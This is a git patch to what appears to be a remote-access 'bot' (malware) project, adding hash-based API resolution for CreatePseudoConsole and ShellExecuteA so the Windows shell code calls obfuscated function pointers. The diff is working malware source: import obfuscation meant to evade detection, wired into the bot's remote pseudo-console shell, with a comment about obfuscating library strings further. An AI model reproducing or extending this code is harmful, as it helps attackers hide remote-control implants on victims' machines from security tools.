From 35cbd91dd178d3699af9a2e919e9867e27fa91a7 Mon Sep 17 00:00:00 2001
From: CPunch <sethtstubbs@gmail.com>
Date: Fri, 8 Jul 2022 12:54:14 -0500
Subject: [PATCH] Bot: Added oCreatePseudoConsole to laikaO_init()

---
 bot/include/obf.h  |  3 +++
 bot/win/winobf.c   | 18 ++++++++++++++----
 bot/win/winshell.c |  3 ++-
 3 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/bot/include/obf.h b/bot/include/obf.h
index 95c7507..dd7d579 100644
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@@ -4,12 +4,15 @@
 #include "laika.h"
 
 #ifdef _WIN32
+#    include <process.h>
 #    include <windows.h>
 
 /* WINAPI types */
 typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
+typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, HPCON *);
 
 extern _ShellExecuteA oShellExecuteA;
+extern _CreatePseudoConsole oCreatePseudoConsole;
 #endif
 
 void laikaO_init();
diff --git a/bot/win/winobf.c b/bot/win/winobf.c
index dd299c8..d0cd1cd 100644
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@@ -129,15 +129,25 @@ _findByHashFail:
 /* ======================================[[ Exposed API ]]====================================== */
 
 _ShellExecuteA oShellExecuteA;
+_CreatePseudoConsole oCreatePseudoConsole;
 
 void laikaO_init()
 {
     uint32_t hash;
 
     /* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
-    oShellExecuteA = findByHash("shell32.dll", 0x89858cd3);
+    oShellExecuteA = (_ShellExecuteA)findByHash("shell32.dll", 0x89858cd3);
+    oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
 
-    hash = getHashName("ShellExecuteA"); /* 0x89858cd3 */
-    printf("ShellExecuteA: real is %p, hashed is %p. [HASH: %x]\n", (void *)ShellExecuteA,
-           findByHash("shell32.dll", hash), hash);
+/*
+    hash = getHashName("CreateProcessA"); // 0x9e687c1d
+    printf("CreateProcessA: real is %p, hashed is %p. [HASH: %x]\n",
+           (void *)CreateProcessA,
+           findByHash("kernel32.dll", hash), hash);
+
+    hash = getHashName("InitializeProcThreadAttributeList");
+    printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
+           (void *)InitializeProcThreadAttributeList,
+           findByHash("kernel32.dll", hash), hash);
+*/
 }
\ No newline at end of file
diff --git a/bot/win/winshell.c b/bot/win/winshell.c
index 4370fd6..80165bb 100644
--- a/bot/win/winshell.c
+++ b/bot/win/winshell.c
@@ -1,5 +1,6 @@
 /* platform specific code for opening shells (pseudo consoles) on windows */
 #include "bot.h"
+#include "obf.h"
 #include "lerror.h"
 #include "lmem.h"
 #include "shell.h"
@@ -128,7 +129,7 @@ HRESULT CreatePseudoConsoleAndPipes(HPCON *phPC, HANDLE *phPipeIn, HANDLE *phPip
         return HRESULT_FROM_WIN32(GetLastError());
 
     /* create the pseudo console of the required size, attached to the PTY - end of the pipes */
-    hr = CreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);
+    hr = oCreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);
 
     /* we can close the handles to the PTY-end of the pipes here
        because the handles are dup'ed into the ConHost and will be released